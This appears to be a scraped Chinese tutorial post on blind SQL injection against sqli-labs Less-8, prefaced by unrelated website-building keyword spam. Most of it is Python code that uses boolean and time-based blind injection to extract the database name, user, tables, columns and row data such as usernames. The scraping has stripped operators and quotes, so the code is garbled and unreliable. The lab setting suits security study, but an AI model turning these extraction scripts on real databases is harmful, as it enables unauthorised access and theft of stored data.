用商城系统做教育网站,做企业官网需要多少钱,网站设计专家,如何建网站看到物联网设备信息在sqli-labs中的第8题无回显可以尝试盲注的手法获取数据 发现页面加载了3秒左右可以进行盲注
布尔盲注数据库名
import requestsdef inject_database(url):datanamefor i in range(1,15):low 32high 128mid (low high) // 2while low high:path id1 and asci…在sqli-labs中的第8题无回显可以尝试盲注的手法获取数据 发现页面加载了3秒左右可以进行盲注
布尔盲注数据库名
import requestsdef inject_database(url):datanamefor i in range(1,15):low 32high 128mid (low high) // 2while low high:path id1 and ascii(substr(database(),%d, 1)) %d-- % (i,mid)r requests.get(url,path)if You are in........... in r.text:low mid 1else :high midmid (low high) // 2if mid 32:breakdataname chr(mid)print(dataname)if __name____main__:url http://127.0.0.1:8989/Less-8/inject_database(url)
结果 用时间盲注出用户名
import requests
import timedef inject_user(url):userfor i in range(1,15):low 32high 128mid (low high) // 2while low high:payload f1 and if(ascii(substr(user(), {i}, 1)) {mid},sleep(1),0)-- res {id:payload}start_time time.time()r requests.get(url,paramsres)if (time.time() - start_time)1:# 匹配成功low mid 1else :high midmid (low high) // 2if mid 32:breakuser chr(mid)print(user)if __name____main__:url http://127.0.0.1:8989/Less-8/inject_user(url)结果 用盲注的方式查询表、列、具体数据
if __name__ __main__:url http://127.0.0.1:8989/Less-8/# 获取当前数据库名database_name inject_database(url)print(fDatabase name: {database_name})# 获取数据库中的表名tables inject_tables(url, database_name)print(fTables in database {database_name}: {tables})# 获取指定表中的列名table_name users # 替换为目标表名columns inject_columns(url, table_name)print(fColumns in table {table_name}: {columns})# 获取指定表中特定列的数据column_name username # 替换为目标列名data inject_data(url, table_name, column_name)print(fData in column {column_name} of table {table_name}: {data})
时间检测模块
# 发送请求并检查响应时间
def check_time_injection(url, payload):res {id: payload}start_time time.time()r requests.get(url, paramsres)elapsed_time time.time() - start_timereturn elapsed_time 1 # 假设延迟超过1秒表示查询成功
数据库模块
# 获取当前数据库名
def inject_database(url):datanamefor i in range(1,15):low 32high 128mid (low high) // 2while low high:payload 1 and ascii(substr(database(),%d, 1)) %d-- % (i,mid)res {id:payload}r requests.get(url,paramsres)if You are in........... in r.text:low mid 1else :high midmid (low high) // 2if mid 32:breakdataname chr(mid)print(dataname)return dataname
数据库中表名模块
# 获取指定数据库中的表名
def inject_tables(url, database_name):tables []table_index 0while True:table_index 1table_name for i in range(1, 20): # 假设表名长度不超过20字符low 32high 128while low high:mid (low high) // 2payload f, and if(ascii(substr(select table_name from information_schema.tables where table_name{database_name} limit {table_index-1},1),{i},1 {mid},sleep(1),0)-- if check_time_injection(url, payload):low mid 1else:high midif low 32: # ASCII码32为空格通常表示结束breaktable_name chr(low)print(fCurrent table name: {table_name})if table_name:tables.append(table_name)print(fFound table: {table_name})else:breakreturn tables
列名模块
def inject_columns(url, table_name):columns []column_index 0while True:column_index 1column_name for i in range(1, 20): # 假设列名长度不超过20字符low 32high 128while low high:mid (low high) // 2payload f1 and if(ascii(substr((select column_name from information_schema.columns where table_name{table_name} limit {column_index-1},1),{i},1)) {mid},sleep(1),0) -- if check_time_injection(url, payload):low mid 1else:high midif low 32: # ASCII码32为空格通常表示结束breakcolumn_name chr(low)print(fCurrent column name: {column_name})if column_name:columns.append(column_name)print(fFound column: {column_name})else:breakreturn columns
指定查询数据模块
# 获取指定表中特定列的数据
def inject_data(url, table_name, column_name):data []row_index 0while True:row_index 1row_value for i in range(1, 20): # 假设数据长度不超过20字符low 32high 128while low high:mid (low high) // 2payload f1 and if(ascii(substr((select {column_name} from {table_name} limit {row_index-1},1),{i},1)) {mid},sleep(1),0) -- if check_time_injection(url, payload):low mid 1else:high midif low 32: # ASCII码32为空格通常表示结束breakrow_value chr(low)print(fCurrent row value: {row_value})if row_value:data.append(row_value)print(fFound data: {row_value})else:breakreturn data
结果
数据库 列 user
